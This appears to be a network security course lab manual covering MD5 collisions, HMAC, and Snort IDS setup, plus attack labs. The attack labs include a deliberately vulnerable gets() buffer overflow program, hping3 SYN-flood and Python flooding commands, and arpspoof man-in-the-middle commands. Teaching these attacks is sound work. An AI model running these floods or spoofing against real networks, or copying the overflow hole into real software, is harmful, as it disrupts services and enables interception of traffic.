
Network Security Lab Manual

The document outlines a series of network security lab exercises, including MD5 hash collision demonstration, computing MAC and HMAC, buffer overflow attack, DoS and DDoS simulation, ARP poisoning, botnet detection, and Snort IDS installation and configuration. Each lab includes aims, requirements, procedures, expected outputs, and results, providing practical experience in various security concepts and techniques. The labs utilize programming languages such as Python and C, along with tools like Snort and Hping3.

Uploaded by

karakmurak742

NETWORK SECURITY LAB MANUAL

Lab 1: MD5 Hash Collision Demonstration


Aim:
To demonstrate two different certificates/files producing the same MD5 hash.

Requirements:
• Python
• hashlib library
• Example MD5 collision files (e.g., from https://www.mscs.dal.ca/~selinger/md5collision/)

Procedure:
1. Download msg1.bin and msg2.bin.
2. Use Python to compute and compare hashes.

Sample Code:
python
import hashlib

def get_md5_hash(file):
    # Read the file as raw bytes and return its MD5 digest in hex
    with open(file, 'rb') as f:
        return hashlib.md5(f.read()).hexdigest()

print("MD5 of msg1.bin:", get_md5_hash("msg1.bin"))
print("MD5 of msg2.bin:", get_md5_hash("msg2.bin"))

Expected Output:
Both files will output the same MD5 hash value, demonstrating a collision.
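
Added example (not part of the original manual): the same check run on a widely published 128-byte MD5 collision pair embedded inline, so it works offline without msg1.bin and msg2.bin. It also compares the raw bytes and the SHA-256 digests, which is what shows that the inputs really differ; the names `compare` and `is_md5_collision` are chosen here.

```python
import hashlib

# Widely published MD5 collision pair (two 128-byte messages), hex-encoded.
# Embedded for an offline run; these are not the manual's msg1.bin/msg2.bin.
MSG_A = bytes.fromhex(
    "d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f89"
    "55ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5b"
    "d8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0"
    "e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70"
)
MSG_B = bytes.fromhex(
    "d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f89"
    "55ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5b"
    "d8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0"
    "e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70"
)

def compare(a: bytes, b: bytes) -> dict:
    """Report whether two inputs differ and which digests agree."""
    return {
        "identical_bytes": a == b,
        "differing_offsets": [i for i, (x, y) in enumerate(zip(a, b)) if x != y],
        "md5_equal": hashlib.md5(a).digest() == hashlib.md5(b).digest(),
        "sha256_equal": hashlib.sha256(a).digest() == hashlib.sha256(b).digest(),
    }

def is_md5_collision(a: bytes, b: bytes) -> bool:
    """True only when the contents differ but the MD5 digests match."""
    result = compare(a, b)
    return result["md5_equal"] and not result["identical_bytes"]

if __name__ == "__main__":
    for name, value in compare(MSG_A, MSG_B).items():
        print(f"{name}: {value}")
    print("MD5 collision:", is_md5_collision(MSG_A, MSG_B))
```

The matching MD5 with a differing SHA-256 is the reason file or certificate integrity checks should rely on SHA-256 or stronger rather than MD5.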

Result:
Successfully demonstrated MD5 hash collision using two files.

Lab 2: Computing MAC, HASH, and HMAC

Aim:
To compute MAC, HASH (MD5, SHA), and HMAC for sample messages.

Requirements:
• Python
• hashlib, hmac

Procedure:
python
import hashlib
import hmac
message = b"NetworkSecurityLab"
key = b"secretkey"
# Hash
print("MD5:", hashlib.md5(message).hexdigest())
print("SHA256:", hashlib.sha256(message).hexdigest())
# HMAC
h = hmac.new(key, message, hashlib.sha256)
print("HMAC:", h.hexdigest())

Expected Output:
Hash and HMAC values for the given message.
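
Added example (not part of the original manual): verifying the values the lab computes, to show what the key adds. It reuses the lab's sample key and message; the altered message, the second key and all function names are constructed here.

```python
import hashlib
import hmac

KEY = b"secretkey"               # sample key from the lab
MESSAGE = b"NetworkSecurityLab"  # sample message from the lab

def hmac_tag(key: bytes, message: bytes) -> str:
    return hmac.new(key, message, hashlib.sha256).hexdigest()

def verify_hash(message: bytes, digest_hex: str) -> bool:
    """Integrity check with an unkeyed hash: anyone can recompute it."""
    return hmac.compare_digest(hashlib.sha256(message).hexdigest(), digest_hex)

def verify_hmac(key: bytes, message: bytes, tag_hex: str) -> bool:
    """Authenticity check: only a holder of the key can produce a valid tag.
    compare_digest avoids leaking where the first mismatch is via timing."""
    return hmac.compare_digest(hmac_tag(key, message), tag_hex)

def run_checks() -> dict:
    altered = b"NetworkSecurityLab-altered"  # constructed modified message
    genuine_tag = hmac_tag(KEY, MESSAGE)
    # All that a party without the key can attach to the altered message:
    recomputed = hashlib.sha256(altered).hexdigest()
    return {
        "hmac_accepts_genuine": verify_hmac(KEY, MESSAGE, genuine_tag),
        "hmac_accepts_altered_message": verify_hmac(KEY, altered, genuine_tag),
        "hmac_accepts_tag_from_other_key": verify_hmac(
            KEY, MESSAGE, hmac_tag(b"otherkey", MESSAGE)),
        "hash_accepts_altered_with_new_hash": verify_hash(altered, recomputed),
        "hmac_accepts_altered_with_new_hash": verify_hmac(KEY, altered, recomputed),
    }

if __name__ == "__main__":
    for name, accepted in run_checks().items():
        print(f"{name}: {accepted}")
```

A plain hash travelling with the message only detects accidental corruption; the HMAC check is the one that rejects a modified message whose check value was recomputed without the key.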

Result:
Successfully computed HASH and HMAC values.

Lab 3: Buffer Overflow Attack

Aim:
To demonstrate a basic buffer overflow vulnerability and exploit.

Requirements:
• C program
• Linux system
• gcc compiler

Procedure:
c
#include <stdio.h>
#include <string.h>

/* Never called by the program; reaching it shows control flow was redirected */
void secret() {
    printf("You entered the secret function!\n");
}

void vulnerable() {
    char buffer[64];
    gets(buffer); // vulnerable to overflow: gets() does no bounds checking
}

int main() {
    vulnerable();
    return 0;
}

Steps:
1. Compile with gcc -fno-stack-protector -z execstack -o overflow overflow.c
2. Use crafted input to overwrite return address.

Expected Output:
Redirection to the secret() function.

Result:
Buffer overflow successfully exploited.

Lab 4: Denial-of-Service (DoS) and DDoS Simulation


Aim:
To simulate DoS and DDoS attacks using tools.

Requirements:
• Tools: LOIC, Hping3, or custom Python script

Procedure (DoS using hping3):
bash
sudo hping3 -S --flood -V -p 80 <target-ip>

Procedure (Python DoS):
python
import socket

target = "127.0.0.1"
port = 80

for i in range(1000):
    s = socket.socket()
    s.connect((target, port))
    s.send(b"GET / HTTP/1.1\r\nHost: localhost\r\n\r\n")

Expected Output:
Server slows down or becomes unresponsive.

Result:
DoS and DDoS attack simulation completed.

Lab 5: ARP Poisoning and Man-in-the-Middle (MITM)


Aim:
To implement ARP spoofing and perform a MITM attack.

Requirements:
• Kali Linux
• Tools: arpspoof, ettercap

Procedure:
bash
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# Spoof ARP
arpspoof -i eth0 -t <victim-ip> <gateway-ip>

Expected Output:
MITM achieved; victim's traffic is routed through attacker.

Result:
ARP spoofing and MITM demonstrated successfully.

Lab 6: Botnet Attack Detection Using Public Dataset


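Aim:
To detect botnet traffic using public datasets (e.g., CTU-13).

Requirements:
• Python
• Dataset from https://www.stratosphereips.org/datasets-ctu13
• Tools: pandas, scikit-learn

Procedure:
1. Load dataset
2. Preprocess data
3. Train ML model

Sample Code Snippet:
python
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

df = pd.read_csv("ctu13_dataset.csv")
# Features must be numeric after preprocessing (step 2); "label" is the target
X = df.drop("label", axis=1)
y = df["label"]

# Hold out 30% of the flows so accuracy is measured on data the model has not seen
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.3, stratify=y, random_state=42)

model = RandomForestClassifier(random_state=42)
model.fit(X_train, y_train)

print("Accuracy:", model.score(X_test, y_test))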


Expected Output:
Botnet traffic detected using ML.

Result:
Botnet detection using dataset implemented.

Lab 7: Install Snort Intrusion Detection System

Aim:
To install and configure Snort as an IDS.

Requirements:
• Ubuntu/Kali
• Internet connection

Procedure:
bash
sudo apt update
sudo apt install snort

Configuration:
• Edit /etc/snort/snort.conf
• Set HOME_NET

Expected Output:
Snort runs in IDS mode.

Result:
Snort successfully installed and configured.

Lab 8: Implement Firewall Rules using Snort


Aim:
To write Snort rules to block/filter malicious traffic.

Requirements:
• Snort installed

Sample Rule:
bash
alert tcp any any -> any 80 (msg:"HTTP Access Detected"; sid:1000001; rev:1;)

Steps:
1. Add rule to local.rules
2. Update snort.conf
3. Run snort
bash
snort -A console -q -c /etc/snort/snort.conf -i eth0

Expected Output:
Alerts generated when HTTP traffic is detected.

Result:
Firewall rules using Snort implemented successfully.

Lab 9: Generate and Detect Network Attack Using Snort


Aim:
To simulate a network attack and detect it using Snort.

Tools Required:
• Snort
• Attack Tool (e.g., hping3)

Procedure:
1. Launch a simulated TCP SYN flood using:
bash
hping3 -S --flood -p 80 <victim-ip>
2. Monitor with Snort in real-time.
bash
snort -A console -q -c /etc/snort/snort.conf -i eth0

Expected Output:
Snort detects and logs the SYN flood attack.

Result:
Network attack detected using Snort.
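
Added example (not part of the original manual, and not Snort's own code): the rate-threshold logic behind SYN-flood detection, run over constructed packet records. The record layout, the documentation-range addresses and the threshold of 100 SYNs per second per destination are assumptions chosen here.

```python
from collections import defaultdict, deque

def detect_syn_flood(packets, threshold=100, window_ms=1000):
    """Alert once per burst when more than `threshold` SYN-only segments
    reach one (dst_ip, dst_port) within `window_ms` milliseconds.
    Tracking by destination still works when source addresses vary."""
    recent = defaultdict(deque)   # (dst_ip, dst_port) -> SYN timestamps in window
    alerting = set()              # destinations currently over the threshold
    alerts = []
    for ts_ms, src_ip, dst_ip, dst_port, flags in packets:
        if flags != "S":          # count bare SYNs only, not SYN/ACK or ACK
            continue
        key = (dst_ip, dst_port)
        window = recent[key]
        window.append(ts_ms)
        while ts_ms - window[0] > window_ms:   # drop SYNs older than the window
            window.popleft()
        if len(window) > threshold:
            if key not in alerting:            # report the start of a burst once
                alerting.add(key)
                alerts.append((ts_ms, dst_ip, dst_port, len(window)))
        else:
            alerting.discard(key)
    return alerts

def constructed_background():
    """Constructed sample: one new connection every 500 ms for 10 s."""
    pkts = []
    for i in range(20):
        client = f"198.51.100.{i + 1}"
        pkts.append((i * 500, client, "192.0.2.10", 80, "S"))
        pkts.append((i * 500 + 10, client, "192.0.2.10", 80, "A"))
    return pkts

def constructed_flood(start_ms=20000):
    """Constructed sample: 500 bare SYNs, 1 ms apart, to the same port."""
    return [(start_ms + i, "203.0.113.5", "192.0.2.10", 80, "S")
            for i in range(500)]

if __name__ == "__main__":
    traffic = constructed_background() + constructed_flood()
    for alert in detect_syn_flood(traffic):
        print("SYN flood suspected:", alert)
```

Normal connection setup stays far below the threshold, while the flood trips it on the 101st SYN inside one second; a rule that alerts on every packet to port 80 cannot make that distinction.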
